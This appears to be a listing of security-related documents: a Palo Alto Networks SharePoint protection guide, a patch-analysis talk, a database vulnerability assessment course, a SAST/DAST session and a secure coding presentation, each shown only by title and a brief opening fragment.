Using Palo Alto Networks to Protect Microsoft SharePoint Deployments June 2009 Palo Alto Networks 232 East Java Dr. Sunnyvale, CA 94089 Sales 866.207.0077 www.paloaltonetworks.com Table of Contents Introduction...
Microsoft Patch Analysis
Microsoft Patch Analysis Patch Tuesday - Exploit Wednesday Yaniv Miron aka Lament 1 / About Me Yaniv Miron aka Lament Security Researcher and Consultant Found security vulnerabilities in IBM, Oracle, Microsoft
Database Assessment. Vulnerability Assessment Course
Database Assessment Vulnerability Assessment Course All materials are licensed under a Creative Commons Share Alike license. http://creativecommons.org/licenses/by-sa/3.0/ 2 Agenda Introduction Configuration
SAST, DAST and Vulnerability Assessments, 1+1+1 = 4
SAST, DAST and Vulnerability Assessments, 1+1+1 = 4 Gordon MacKay Digital Defense, Inc. Chris Wysopal Veracode Session ID: Session Classification: ASEC-W25 Intermediate AGENDA Risk Management Challenges
Secure Coding. Code development practice Mitigates basic vulnerabilities. Made by security experts, for non-security experts
1 Secure Coding Code development practice Mitigates basic vulnerabilities XSS SQL Injection Made by security experts, for non-security experts Mainly developers In practice, commonly used as the only measure
